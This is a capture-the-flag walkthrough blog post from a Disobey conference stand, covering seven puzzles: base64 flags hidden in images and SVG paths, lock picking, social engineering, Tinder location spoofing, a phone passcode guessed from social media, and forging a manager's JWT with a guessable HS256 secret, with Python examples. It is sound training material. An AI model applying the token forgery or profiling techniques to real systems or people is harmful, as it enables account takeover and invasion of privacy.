Gofore attended Disobey for the first time. We wanted to contribute to the capture-the-flag activities, and I had the honour of being part of the team. Here is a walkthrough of the flags.
Credits to Cleviane Rebeca Silva, Timo Tammi and Otto Salminen for the final flag.
We had seven flags in total, and two of them remained unsolved. Some of the flags were connected: even though some were relatively easy, they also contained hints for solving something else. Five of the flags were available from Friday and two only on Saturday. Some flags were physical ones located at the Gofore stand at Disobey.
The background story in our CTF activities was:
The CEO of Erofog is asking for your help. One of their employees, Seppo Sorsa, seems a bit forgetful and sloppy. Are the company secrets compromised? Follow Seppo’s trail.
The First Flag: The card
The first flag was about Seppo losing his member card. The task was to social engineer one of the Gofore employees at the stand at Disobey into showing the card and then take a photo of it. The card contained a PDF417 barcode that you could read to obtain the flag.
The Second Flag: Twitter
The second flag was hidden in Seppo Sorsa’s Twitter account. There were 8 pictures, one of which contained a hint for another flag. Most of the pictures were AI-generated.
Only one of the photos looked like it had been uploaded directly from a phone, and it had a higher resolution than the others. To me it was a surprise that this flag wasn’t easy at all, as it remained unsolved. The flag was hidden in plain sight.
The description of the CTF gave the format of the flag: all the flags started with GFLAG. So we knew that if we saw something starting with R0ZMQU, it was probably the flag in base64. It is quite usual for CTF puzzles to encode the flag. If you magnify the photo you notice some text near the base of the tone arm that appears to be part of a base64-encoded flag. After manipulating the colors you can see the rest of the flag, and it is indeed the flag in base64.
There were many ways of getting the flag text from the image. One could write an image-to-text converter for base64 or just read the text manually, for example. The catch was that probably none of the image-to-text converters on the internet work directly on this, since they are meant for natural languages, so they got at least some of the characters wrong. After decoding the base64 to a string you have the flag.
The Third Flag: The Lock
The third flag was a physical one. There was a file cabinet with a lock and a lockpick set at Disobey.
After picking the lock the cabinet seemed empty, but there was actually a notebook under the bottom.
The notebook contained the flag as well as a mysterious password to the intranet.
The Fourth Flag: The repository
The next flag was in a repository on GitHub. Seppo’s side project had a public repository at https://github.com/erofog/Seppo_love, and one of the files contained something extra. The repository held a bulky Android project with a few commits. The code in the commits was nothing special. From the commits you could immediately find something interesting, but we’ll skip that for now. The project looks quite normal, so let’s go to the resources, which contain some interesting-looking files. To solve this flag one needed an eye for detail and/or an understanding of image formats.
The icon.svg and icon1.svg look like they could contain something. On closer inspection you can see that icon1 indeed contains an extra base64 comment between the .
The decoded message is: This is not the file you’re looking for.
Ok, so we’re maybe close but not quite there. As the other icon.svg is virtually the same file, we should not spend time on that either. Let’s look into the next image file, loginfailed_icon.svg. SVG is a format where the picture consists of vector paths, each of which draws a certain part of the picture. On closer inspection you can see that one of the paths has very different-looking points than the other paths: there are more of them, and they are integers instead of decimals. Also, the different-looking path doesn’t draw anything, which you can see from its fill and stroke attributes. In the visible paths fill and stroke have the value #00000, whereas in the invisible path the value is none.
We can try and see what it draws if we change its fill and stroke to #00000.
Well, that didn’t make sense. Maybe there is something in the numbers? As the numbers are clearly not points in the picture and their format differs from the other points, we could try and see what the integers look like as characters. With a simple Python script we can convert the integers to characters. After printing the characters we see that they look like base64. Let’s continue: join them, decode, and there it is! The flag is found. Here is an example code for solving this:
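As an added example (not the post’s own script), this Python code does the whole extraction: it picks out the SVG path whose fill and stroke are none, reads its integer "coordinates" as character codes, and base64-decodes the result. The SVG below is a constructed stand-in for loginfailed_icon.svg and the flag value is a placeholder.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed sample imitating the pattern in the repository's SVG: the visible
# path uses decimal coordinates and fill="#000000"; the hidden path is drawn with
# fill="none" stroke="none" and its "coordinates" are integer character codes
# spelling a base64 string. The flag text is a placeholder, not the real one.
HIDDEN = base64.b64encode(b"GFLAG{placeholder}").decode()
SAMPLE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">'
    '<path fill="#000000" stroke="#000000" d="M12.5 2.25 L21.75 12.5 L12.5 21.75 Z"/>'
    '<path fill="none" stroke="none" d="M '
    + " ".join(str(ord(c)) for c in HIDDEN) + '"/>'
    "</svg>"
)

SVG_NS = "{http://www.w3.org/2000/svg}"


def invisible_paths(svg_text):
    """Return the d attribute of every path that has both fill and stroke set to none."""
    root = ET.fromstring(svg_text)
    return [p.get("d", "") for p in root.iter(SVG_NS + "path")
            if p.get("fill") == "none" and p.get("stroke") == "none"]


def ints_from_path(d):
    """Pull the whole-number tokens out of a path; decimals are real coordinates."""
    return [int(t) for t in re.findall(r"(?<![\d.])\d+(?![\d.])", d)]


def decode_hidden_flag(svg_text):
    """Try each invisible path as a list of character codes holding base64 text."""
    for d in invisible_paths(svg_text):
        codes = ints_from_path(d)
        # Only printable ASCII is worth trying as text
        if not codes or not all(32 <= c < 127 for c in codes):
            continue
        text = "".join(chr(c) for c in codes)
        try:
            decoded = base64.b64decode(text, validate=True).decode()
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.startswith("GFLAG"):
            return decoded
    return None
```

Running `decode_hidden_flag` on the real file would need the SVG read from disk; the same functions apply unchanged.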
The Fifth Flag: Tinder
In this task we were supposed to use the hints from the repository to find Seppo’s profile on another service, so the hint was found while solving flag number 4. In the commits of the repository you can find deleted rows that contain interesting information:
From this we can deduce (or google) that Seppo is using Tinder with a location somewhere in Kittilä. First let’s find out the coordinates of Pokka. With a location spoofer we can set our location to Pokka, Kittilä, and log in to Tinder with the spoofed location.
Then it is up to the other parameters to find the correct profile. Apparently Tinder is not very accurate with location, so there might have been a bit of luck in the game too; using a slightly different location could help. The profile that was used to find Seppo could be 29 km away from the location. Also, it needed to be at most 10 years younger or older than Seppo, who is 48 years old; his age was available on his Twitter. After “being in the correct location” with a correctly aged profile, you could see the profile that contained the flag:
The Sixth Flag: Phone
The first flag for Saturday was a physical one. The task was to get into Seppo’s phone using the hints from social media. Seppo had shared on Twitter the year he was born, and that was the passcode to the phone. On the phone the flag could be found in the calendar. However, the browser contained something interesting too: a website address saved as a bookmark, which was essential for the next task. Submitting this flag opened the final task.
The Final Flag: The intranet
The seventh task was the intranet. So far we had gathered the website address from the phone task and the intranet password from the lock-picking task.
After logging in there was a control panel with different projects and a downloadable report.
Let’s download the report first.
The report contained binary data that on closer inspection was not a lead.
We can try to see whether the other projects have something in them. After changing the project there is an interesting-looking button.
Pressing it gives a warning that we don’t have permission and should contact our manager.
On the intranet we can find Seppo’s profile, which tells us who the manager is. There might be something important in the About me section too?
Let’s look at the web page in a little more detail. Something in the token catches the eye. Paste the token into jwt.io to see what it contains: there is the user and then a secret. We already know we want to be able to sign in as the manager, and we know the manager’s name.
Maybe Seppo’s profile gave a hint about the secret? What was it about Seppo liking the retro game H.E.R.O.?
Change the token so that the user is kylli.kyyber@erofog.com and the secret is Helicopter Emergency Rescue Operation.
Then let’s try whether we can use the new token to make it seem like we’re logged in as Kylli Kyyber.
I used Burp Suite to intercept the request and manipulate the token before sending it, and there it is: the final flag.
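Why the intranet accepted the edited token comes down to how HS256 JWTs are checked. The Python below is an added example, not the intranet’s code: it decodes a token the way jwt.io shows it, verifies the HMAC signature, and shows that a token for another user passes verification whenever the signing secret is guessable, and fails once the server uses a random secret. The secret phrase and the manager address are the ones from the task; the Seppo address is constructed.

```python
import base64
import hashlib
import hmac
import json
import secrets


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWT encodes each segment."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_parts(token: str):
    """Decode header and payload without verifying, like pasting the token into jwt.io."""
    h, p, _ = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def sign_hs256(payload: dict, secret: str) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    body = (b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
            + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(secret.encode(), body.encode(), hashlib.sha256).digest()
    return body + "." + b64url(sig)


def verify_hs256(token: str, secret: str):
    """Return the payload only if the signature checks out under `secret`, else None."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        return None
    if json.loads(b64url_decode(h)).get("alg") != "HS256":  # the token must not pick the algorithm
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


# Constructed scenario: the server signs with the phrase hinted on Seppo's profile.
GUESSABLE_SECRET = "Helicopter Emergency Rescue Operation"
SEPPO_TOKEN = sign_hs256({"user": "seppo.sorsa@erofog.com"}, GUESSABLE_SECRET)
MANAGER_TOKEN = sign_hs256({"user": "kylli.kyyber@erofog.com"}, GUESSABLE_SECRET)


def accepted_under(secret: str) -> bool:
    """A manager token minted with the guessed phrase passes only if the server uses that phrase."""
    return verify_hs256(MANAGER_TOKEN, secret) == {"user": "kylli.kyyber@erofog.com"}
```

A server that keeps its secret random (for example `secrets.token_hex(32)`) makes the same edit in jwt.io or Burp fail the signature check, which is the only defence against this kind of token tampering.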
Here is actual footage of the CTF action at Disobey: